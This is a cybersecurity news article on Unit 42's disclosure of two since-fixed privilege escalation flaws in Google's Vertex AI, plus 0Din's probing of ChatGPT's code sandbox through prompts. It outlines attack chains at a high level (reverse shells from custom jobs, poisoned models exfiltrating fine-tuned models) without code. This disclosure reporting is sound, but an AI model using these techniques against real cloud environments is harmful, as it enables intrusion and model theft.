• Menu
  • Skip to main content
  • Skip to primary sidebar

The Cyber Security News

Latest Cyber Security News

Header Right

  • Latest News
  • Vulnerabilities
  • Cloud Services
researchers warn of privilege escalation risks in google's vertex ai

Researchers Warn of Privilege Escalation Risks in Google’s Vertex AI ML Platform

You are here: Home / General Cyber Security News / Researchers Warn of Privilege Escalation Risks in Google’s Vertex AI ML Platform
November 15, 2024

Cybersecurity researchers have disclosed two security flaws in Google’s Vertex machine learning (ML) platform that, if successfully exploited, could allow malicious actors to escalate privileges and exfiltrate models from the cloud.

“By exploiting custom job permissions, we were able to escalate our privileges and gain unauthorized access to all data services in the project,” Palo Alto Networks Unit 42 researchers Ofir Balassiano and Ofir Shaty said in an analysis published earlier this week.

“Deploying a poisoned model in Vertex AI led to the exfiltration of all other fine-tuned models, posing a serious proprietary and sensitive data exfiltration attack risk.”

✔ Approved From Our Partners
AOMEI Backupper Lifetime

Protect and backup your data using AOMEI Backupper. AOMEI Backupper takes secure and encrypted backups from your Windows, hard drives or partitions. With AOMEI Backupper you will never be worried about loosing your data anymore.

Get AOMEI Backupper with 72% discount from an authorized distrinutor of AOMEI: SerialCart® (Limited Offer).

➤ Activate Your Coupon Code


Vertex AI is Google’s ML platform for training and deploying custom ML models and artificial intelligence (AI) applications at scale. It was first introduced in May 2021.

Cybersecurity

Crucial to leveraging the privilege escalation flaw is a feature called Vertex AI Pipelines, which allows users to automate and monitor MLOps workflows to train and tune ML models using custom jobs.

Unit 42’s research found that by manipulating the custom job pipeline, it’s possible to escalate privileges to gain access to otherwise restricted resources. This is accomplished by creating a custom job that runs a specially-crafted image designed to launch a reverse shell, granting backdoor access to the environment.

The custom job, per the security vendor, runs in a tenant project with a service agent account that has extensive permissions to list all service accounts, manage storage buckets, and access BigQuery tables, which could then be abused to access internal Google Cloud repositories and download images.

The second vulnerability, on the other hand, involves deploying a poisoned model in a tenant project such that it creates a reverse shell when deployed to an endpoint, abusing the read-only permissions of the “custom-online-prediction” service account to enumerate Kubernetes clusters and fetch their credentials to run arbitrary kubectl commands.

“This step enabled us to move from the GCP realm into Kubernetes,” the researchers said. “This lateral movement was possible because permissions between GCP and GKE were linked through IAM Workload Identity Federation.”

The analysis further found that it’s possible to make use of this access to view the newly created image within the Kubernetes cluster and get the image digest – which uniquely identifies a container image – using them to extract the images outside of the container by using crictl with the authentication token associated with the “custom-online-prediction” service account.

On top of that, the malicious model could also be weaponized to view and export all large-language models (LLMs) and their fine-tuned adapters in a similar fashion.

This could have severe consequences when a developer unknowingly deploys a trojanized model uploaded to a public repository, thereby allowing the threat actor to exfiltrate all ML and fine-tuned LLMs. Following responsible disclosure, both the shortcomings have been addressed by Google.

“This research highlights how a single malicious model deployment could compromise an entire AI environment,” the researchers said. “An attacker could use even one unverified model deployed on a production system to exfiltrate sensitive data, leading to severe model exfiltration attacks.”

Organizations are recommended to implement strict controls on model deployments and audit permissions required to deploy a model in tenant projects.

Cybersecurity

The development comes as Mozilla’s 0Day Investigative Network (0Din) revealed that it’s possible to interact with OpenAI ChatGPT’s underlying sandbox environment (“/home/sandbox/.openai_internal/”) via prompts, granting the ability to upload and execute Python scripts, move files, and even download the LLM’s playbook.

That said, it’s worth noting that OpenAI considers such interactions as intentional or expected behavior, given that the code execution takes place within the confines of the sandbox and is unlikely to spill out.

“For anyone eager to explore OpenAI’s ChatGPT sandbox, it’s crucial to understand that most activities within this containerized environment are intended features rather than security gaps,” security researcher Marco Figueroa said.

“Extracting knowledge, uploading files, running bash commands or executing python code within the sandbox are all fair game, as long as they don’t cross the invisible lines of the container.”

Found this article interesting? Follow us on Twitter  and LinkedIn to read more exclusive content we post.


Some parts of this article are sourced from:
thehackernews.com

Previous Post: «master certificate management: join this webinar on crypto agility and Master Certificate Management: Join This Webinar on Crypto Agility and Best Practices
Next Post: Warning: DEEPDATA Malware Exploiting Unpatched Fortinet Flaw to Steal VPN Credentials warning: deepdata malware exploiting unpatched fortinet flaw to steal vpn»

Reader Interactions

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Report This Article

Recent Posts

  • Zero-Click Agentic Browser Attack Can Delete Entire Google Drive Using Crafted Emails
  • Critical XXE Bug CVE-2025-66516 (CVSS 10.0) Hits Apache Tika, Requires Urgent Patch
  • Chinese Hackers Have Started Exploiting the Newly Disclosed React2Shell Vulnerability
  • Intellexa Leaks Reveal Zero-Days and Ads-Based Vector for Predator Spyware Delivery
  • “Getting to Yes”: An Anti-Sales Guide for MSPs
  • CISA Reports PRC Hackers Using BRICKSTORM for Long-Term Access in U.S. Systems
  • JPCERT Confirms Active Command Injection Attacks on Array AG Gateways
  • Silver Fox Uses Fake Microsoft Teams Installer to Spread ValleyRAT Malware in China
  • ThreatsDay Bulletin: Wi-Fi Hack, npm Worm, DeFi Theft, Phishing Blasts— and 15 More Stories
  • 5 Threats That Reshaped Web Security This Year [2025]

Copyright © TheCyberSecurity.News, All Rights Reserved.